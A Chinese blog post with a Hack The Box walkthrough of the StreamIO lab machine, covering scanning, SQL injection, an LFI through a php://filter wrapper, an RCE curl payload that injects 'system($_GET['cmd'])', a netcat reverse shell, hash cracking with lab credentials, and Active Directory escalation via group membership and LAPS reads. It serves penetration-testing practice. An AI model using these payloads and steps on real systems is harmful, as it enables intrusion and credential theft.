HTB打靶日记:StreamIO

于 2023-01-19 04:38:25 发布
阅读量1.1k 收藏 4
点赞数 2
文章标签: windows 网络安全 安全 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73998094/article/details/128732065
版权

第一次打靶场打到凌晨四点半,确实难

信息收集:

Tcp协议

nmap -p- -sT --min-rate=1000 -Pn  10.129.66.104

 Udp协议

nmap -p- -sU --min-rate=1000 -Pn  10.129.66.104

nmap -p53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49707,54818 -sT -sC -Pn -sV 10.129.66.104

nmap -p123,389 -sC -sV -sU 10.129.66.104

 

发现了域名streamIO.htb与watch.streamIO.htb,加入hosts文件中

53端口 dns协议 ,后尝试了区域传输也没什么发现

 

 389端口 ldap协议,探测其基本信息,并保存在文件中

ldapsearch -H ldap://streamIO.htb  -x -s base -b '' "(objectClass=*)" "*" + >ldap_result.txt

 利用正则将可能存在的子域名取出,并加入hosts文件中

cat ldap_result.txt |grep namingContexts|awk -F '=' '{print $2}' |awk -F ',' '{print $1}'|tail -n 4|sed 's/$/.streamIO.htb/' |tr '\n' ' '

445端口 smb协议

尝试免密登陆失败,但是发现了一个子域名,加入hosts文件中

80、443端口

80端口是默认的iis页面,没什么价值

443端口,在/index.php与/about.php下发现了几个用户名加入用户字典中

 

 尝试fuzz目录,发现了admin目录,不过目前没什么用

wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u https://streamio.htb/FUZZ --hc 404 -t 100

 在用户登陆的位置尝试sql注入

 

 获取了很多hash

 将hash整理一下

 

利用得到的hash尝试crackmapexec尝试smb协议爆破

写了两个循环,可能是环境问题,crackmapexec在批量爆破时总会出现问题,可惜没有一个成功的

 对这些hash利用john解密(出了点问题,不过问题不大)

利用得到的密码对web的登陆界面开始爆破

发现用户yoshihide,密码:66boysandgirls.. 可以成功登陆

 再次访问admin目录

 发现了/?后需要有一个参数

 开始fuzz参数名,发现了参数debug

wfuzz -c -u 'https://streamio.htb/admin/?FUZZ' -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -b 'PHPSESSID=rkhp04qqaclokvmcni6tb34juh' --hh 1678

 发现其存在LFI漏洞,成功包含了index.php

 base64解码后发现了数据库账户密码

 对https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource= ,后的文件进行fuzz,发现了master.php文件

wfuzz -c -u 'https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=FUZZ' -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/cat/Language/php.txt -b 'PHPSESSID=rkhp04qqaclokvmcni6tb34juh' --hh 1712

 利用正则读取了maste.php的内容

 发现该php文件中存在eval,并且检查后发现file_get_contents存在rce漏洞

 创建system($_GET['cmd']);

 终于rce了

curl -k  "https://streamio.htb/admin/?debug=master.php&cmd=ping+10.10.16.2"  -H 'Cookie : PHPSESSID=rkhp04qqaclokvmcni6tb34juh' --data-binary "include=data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7" -s

 上传nc后反弹shell

 

 因为之前在index.php中发现了mssql数据库的账户密码,尝试端口转发读取数据库中的全部内容

利用sqsh登陆

 

 在users表下发现了一堆hash

 nikk37          389d14cb8e4e9b94b137deb1caf0612a
 yoshihide       b779ba15cedfd22a023c4d8bcf5f2332
 James           c660060492d9edcaa8332d89c99c9239
 Theodore        925e5408ecb67aea449373d668b7359e
 Samantha        083ffae904143c4796e464dac33c1f7d
 Lauren          08344b85b329d7efd611b7a7743e8a09
 William         d62be0dc82071bccc1322d64ec5b6c51
 Sabrina         f87d3c0d6c8fd686aacc6627f1f493a5

用john爆破发现解密出了一个明文密码

 5985端口开放,利用evil-winrm成功登陆

 利用winpeas发现了key4.db

 利用impacket-smbserver创建smb服务,进行文件传输

 将logins.json与key4.db一起移到firepwd目录下,运行firepwd.py成功破解账户密码

将发现新的账户密码收集起来开始爆破smb协议,发现了JDgodd的密码,可惜无法利用evil-winrm登陆

利用Bloodhound发现jdgodd可用添加到Core Staff组内并且可用ReadLAPSPassword能读取LAPS的密码

【将添加方法记在笔记里,碰到的时候拿来改个账户密码域名就行了,会一点powershell,还是有帮助理解的】

$pass = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
Add-DomainGroupMember -Credential $cred -Identity "Core Staff" -Members "StreamIO\JDgodd"

 已经添加到Core Staff组内

 成功获取了LAPS的密码

crackmapexec ldap streamio.htb -d streamio.htb -u 'JDgodd' -p 'JDg0dd1s@d0p3cr3@t0r' -M laps

 利用evil-winrm 成功登陆administrator用户

最后发现root.txt在Martin用户的桌面上(到最后该非得恶心一下)

文(备考oscp版~)
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
IO流、字节流、字节缓冲流
cierxiao的博客
07-03 342
IOIO流概述和分类、字节流、字节缓冲流介绍及语法
靶场笔记-HTB Metatwo
Timerings的博客
02-11 1272
Hack The Box实战靶场,Metatwo笔记
泛函编程(35)-泛函Stream IOIO处理过程-IO Process
TIGER_XC的专栏
07-29 861
IO处理可以说是计算机技术的核心。不是吗?使用计算机的目的就是希望它对输入数据进行运算后向我们输出计算结果。所谓Stream IO简单来说就是对一串按序相同类型的输入数据进行处理后输出计算结果。输入数据源可能是一串键盘字符、鼠标位置坐标、文件字符行、数据库纪录等。如何实现泛函模式的Stream IO处理则是泛函编程不可或缺的技术。 首先,我们先看一段较熟悉的IO程序: import java.
废物的靶场日记 htb-oscp-nibbles
m0_53302733的博客
03-28 914
废物的靶场日记 htb-oscp-nibbles 简单的就不分割了 sudo nmap -sV -A -sC --min-rate=5000 -p- 10.10.10.75 -Pn 经典22 80 22/tcp open tcpwrapped 80/tcp open tcpwrapped 访问发现只有一句hello world!其他啥也没 纯纯的ctf了属于是 F12看到 /nibbleblog/ directory. Nothing interesting here! 进去看到一个网站 searc
java基础10
touhousonic的博客
08-15 273
Stream I/O and Files 知识点:一. 流的概念             程序的主要任务是操纵数据。在Java中,把一组有序的数据序列称为流。根据操作的方向,可以把流分为输入流和             输出流两种。程序从输入流读取数据,向输出流写出数据。             文件    输入流                     输
HTB打靶日记:Stocker
01-15
在本文中,我们将深入探讨一个名为“Stocker”的Hack The Box (HTB)靶场案例,这是一次针对Web安全、Linux系统以及JavaScript的渗透测试练习。首先,我们从信息收集开始,这是任何渗透测试的第一步。 使用Nmap进行...
HTB打靶日记:Investigation
01-27
hackthebox
HTB打靶日记:Mentor
01-11
hackthebox
HTB打靶日记:BroScience
01-10
在本文中,我们将深入探讨一个名为“BroScience”的HackTheBox靶场机器的渗透测试过程。这个场景主要涉及Web安全、Linux系统以及多种攻击技术。首先,我们从信息收集开始,使用Nmap对目标IP(10.129.125.159)进行...
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
fileqstream java_Java 流(Stream)、文件(File)和IO
weixin_39697096的博客
02-16 62
Java 流(Stream)、文件(File)和IOJava.io包几乎包含了所有操作输入、输出需要的类。所有这些流类代表了输入源和输出目标。Java.io包中的流支持很多种格式,比如:基本类型、对象、本地化字符集等等。一个流可以理解为一个数据的序列。输入流表示从一个源读取数据,输出流表示向一个目标写数据。Java为I/O提供了强大的而灵活的支持,使其更广泛地应用到文件传输和网络编程中。但本节讲述...
Stream IO 操作总结
张璟的专栏
07-13 744
  Stream IO 操作总结Stream readerStream writerBasic file IOStream :流,把内存中的字节数据写到文件系统中,把文件系统中的内容读到内存中命名空间:System.IO.Stream基本操作:read write seekcanread canwrite canseek对于有的流不能进行seek操作,如nets
JDK8特性:Stream
热门推荐
mundo.wang的个人博客
11-17 1万+
这个stream流和io流是完全不同的概念。io流的工作是硬盘到内存以及内存到硬盘的操作,而stream流是针对集合的一种管道操作。类似于mybatis-plus可以简化sql操作,stream流也可以简化对集合的操作。
java8流—stream最全实战
IT_Most的博客
10-22 789
java8流stream最全操作~
域渗透TIPS:获取LAPS管理员密码
weixin_34037173的博客
08-01 550
如果你之前有对启用LAPS机制的主机进行渗透测试,那么你应该能体会到该机制的随机化本地管理员密码是有多么令人痛苦。 LAPS将其信息存储在活动目录: 存储密码过期时间:ms-Mcs-AdmPwdExpirationTime: 131461867015760024 以明文显示的存储密码:ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS...
C++ Stream I/O
huozheleisi
12-12 164
C++ Stream I/O Stream Input/Output Stream I/O Applications Stream Output Concept Stream Input Concept Using C++ Objects Standard Output Stream Standard Output Stream, Cont. Formatted Output Standard...
IO 什么是流(Stream),流就是一系列的数据
qq_44776900的博客
09-19 317
IO 什么是流(Stream),流就是一系列的数据 当不同的介质之间有数据交互的时候,JAVA就使用流来实现。 数据源可以是文件,还可以是数据库,网络甚至是其他的程序 比如读取文件的数据到程序中,站在程序的角度来看,就叫做输入流 输入流: InputStream 输出流:OutputStream (个人理解流就是连接数据与程序通道。打个比方奶茶吸管和我的嘴,吸管块就可以比作流,奶茶就是数据,嘴就是程序,) 流的分类 可以分为两大类 字节流和字符流 1字节流 InputStream字节输入流 OutputSt
Stream&&IO
weixin_59378390的博客
05-17 1052
#博学谷IT学习技术支持# 一、IO流的应用场景 IO流,也就是输入流和输出流。 因为在变量,数组和对象中存储的数据是短暂存在的,会随着程序的结束而消失。因此,为了永久性的保存数据,就需要利用IO流将数据存储到文件中或者将文件中的数据读取到内存中。 二、File类 要想使用IO流,必须先掌握文件的创建与删除。因为文件也是对象,所以在java中,把所有的文件统称为文件类,并把相关的方法进行了封装,所以在进行文件的创建时,可以直接和一般对象的创建一样,直接通过new关键字进行创建就好。构造方法如下:
【Java】IO Stream详细解读
weixin_34032779的博客
12-31 89
 成鹏致远 | 2013年12月31日 什么是IO   Java中I/O操作主要是指使用Java进行输入,输出操作.    Java所有的I/O机制都是基于数据流进行输入输出,这些数据流表示了字符或者字节数据的流动序列。   Java的I/O流提供了读写数据的标准方法。任何Java中表示数据源的对象都会提供以数据流的方式读写它的数据的方法。         Java.io是大多数面向数据...
format htb
最新发布
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值